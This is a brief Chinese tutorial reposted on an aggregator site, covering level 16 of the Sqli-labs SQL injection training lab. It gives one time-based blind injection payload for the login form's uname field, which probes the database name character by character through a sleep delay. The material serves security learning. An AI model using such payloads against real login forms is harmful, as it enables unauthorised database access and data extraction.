码迷,mamicode.com
首页 > 数据库 > 详细

Sqli-labs less 16

时间:2016-08-12 00:54:55      阅读:268      评论:0      收藏:0      [点我收藏+]

标签:

Less-16

本关我们的处理方法和less15是一样的,同样的使用延时注入的方法进行解决。这里直接从源代码中看到对id进行 ("id")的处理。(请自行测试)

提交的payload:

uname=admin")and If(ascii(substr(database(),1,1))=115,1,sleep(5))#&passwd=11&submit=Submit

正确的时候可以直接登录,不正确的时候延时5秒。

其他的payload自行构造。

Sqli-labs less 16

标签:

原文地址:http://www.cnblogs.com/lcamry/p/5763050.html

(1)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!